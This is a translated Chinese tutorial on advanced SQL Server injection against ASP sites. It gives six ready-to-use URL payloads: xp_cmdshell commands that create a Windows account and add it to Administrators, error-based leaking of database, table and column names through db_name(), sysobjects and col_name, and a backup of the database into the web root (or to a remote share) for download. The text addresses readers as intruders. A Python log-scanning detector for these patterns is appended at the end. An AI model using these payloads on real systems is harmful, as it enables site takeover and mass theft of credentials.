SQL Injection Vulnerabilities in Full: Advanced Part (1)

xiaoxiao2021-03-06  51

After reading the beginner and intermediate parts, cracking an ordinary site should be no problem. But what if you cannot guess the table name, or the author has filtered out some special characters? How do you raise the injection success rate, and how do you guess more efficiently? Read on in the advanced part.

Section 1: Injecting SQL Server using the system tables

SQL Server is a powerful database system that is tightly integrated with the operating system. That brings developers great convenience, but on the other hand it also gives the injector a springboard. Let's look at a few concrete examples:

1. http://site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

In SQL Server the semicolon separates two statements, and `--` marks the rest of the line as a comment, so this request is split into two statements: first the record with id=1 is selected, then the stored procedure xp_cmdshell is executed. That stored procedure calls system commands, so the NET command here creates a new Windows account with user name `name` and password `password`. Then:

2. http://site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name administrators /add"--

adds the new account `name` to the Administrators group; no need to be polite, you already hold the highest privileges on the system! Of course, this only works when the database connection runs as sa; otherwise there is no permission to call xp_cmdshell.

3. http://site/url.asp?id=1;;and db_name()>0

Earlier we saw a similar example, `and user>0`, whose role is to reveal the user name of the connection. db_name() is another system variable; it returns the name of the connected database.

4. http://site/url.asp?id=1;backup database DatabaseName to disk='c:/inetpub/wwwroot/1.db';--

This is quite a trick: take the database name from example 3, add the absolute path exposed by some IIS error message, back the database up into the web directory, and then download the entire database over HTTP. Every administrator and user password is then out in the open! When you don't know the absolute path, you can also try backing up to a network address (such as //202.96.xx.xx/share/1.db), but the success rate is not high.

5. http://site/url.asp?id=1;;and (select top 1 name from sysobjects where xtype='u' and status>0)>0

As mentioned earlier, sysobjects is SQL Server's system table; it stores all table names, views, constraints and other objects, and xtype='u' and status>0 selects the tables created by users. The statement above takes out the first table name and compares it with 0, so the error message exposes the table name. How do you get the second and third table names? We leave that to our clever readers.

6. http://site/url.asp?id=1;;and (select top 1 col_name(object_id('Name'),1) from sysobjects)>0

Once the table name is obtained as in example 5, object_id('Name') fetches the table's internal ID, and col_name(ID, 1) returns the first field name of that table; changing the 1 to 2, 3, 4 ... fetches the guessed table's field names one by one.

The six points above are the hard core of my study of SQL Server injection. You can see that how well you understand SQL Server directly affects the success rate and guessing speed. After studying SQL Server injection I also improved a lot as a developer; heh, perhaps security and development really do complete each other.
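As an added example (not from the original article), here is detection logic for the six request patterns above, run over constructed IIS W3C-style log lines. It uses only the Python standard library; the rule names, field order and sample log lines are my own assumptions.

```python
# Added example, not from the original article: detection rules for the six
# request patterns above, run over constructed IIS W3C-style log lines.
import re
from urllib.parse import unquote_plus

# One rule per technique from the article (the names are my own labels).
RULES = [
    ("stacked_xp_cmdshell", re.compile(r";\s*exec\s+master\s*\.\.\s*xp_cmdshell", re.I)),
    ("backup_to_disk", re.compile(r";\s*backup\s+database\s+\S+\s+to\s+disk\s*=", re.I)),
    ("sysobjects_enum", re.compile(r"sysobjects\s+where\s+xtype\s*=\s*'u'", re.I)),
    ("col_name_enum", re.compile(r"col_name\s*\(\s*object_id\s*\(", re.I)),
    ("db_name_or_user_probe", re.compile(r"\band\s+(db_name\s*\(\s*\)|user)\s*>\s*0", re.I)),
]

def normalize(query):
    # IIS logs the query string URL-encoded; decode twice so a double-encoded
    # payload is seen the way SQL Server sees it, then collapse whitespace.
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(query)))

def classify(query):
    """Return the names of the rules that match one cs-uri-query value."""
    q = normalize(query)
    return [name for name, rx in RULES if rx.search(q)]

def scan_log(lines):
    """Return (client ip, uri, matched rules) for each suspicious log line.
    Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 7 or parts[0].startswith("#"):
            continue  # skip #Fields directives, blank lines and malformed rows
        tags = classify(parts[5])
        if tags:
            hits.append((parts[2], parts[4], tags))
    return hits

# Constructed sample log (not real traffic); the payloads are the article's own.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-05-01 10:00:01 10.0.0.5 GET /url.asp id=1 200
2004-05-01 10:00:02 10.0.0.9 GET /url.asp id=1;;and+db_name()>0 500
2004-05-01 10:00:03 10.0.0.9 GET /url.asp id=1;;and+(select+top+1+name+from+sysobjects+where+xtype=%27u%27+and+status>0)>0 500
2004-05-01 10:00:04 10.0.0.9 GET /url.asp id=1;exec+master..xp_cmdshell+%22net+user+name+password+/add%22-- 200
""".splitlines()

if __name__ == "__main__":
    for ip, uri, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {uri} -> {', '.join(tags)}")
```

Note that the 500 responses next to the sysobjects and db_name() probes are the error-message channel the article relies on, so a status filter alone would miss the xp_cmdshell request that returned 200.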

(Source: 9cbs)

Please cite the original address when reprinting: https://www.9cbs.com/read-115564.html
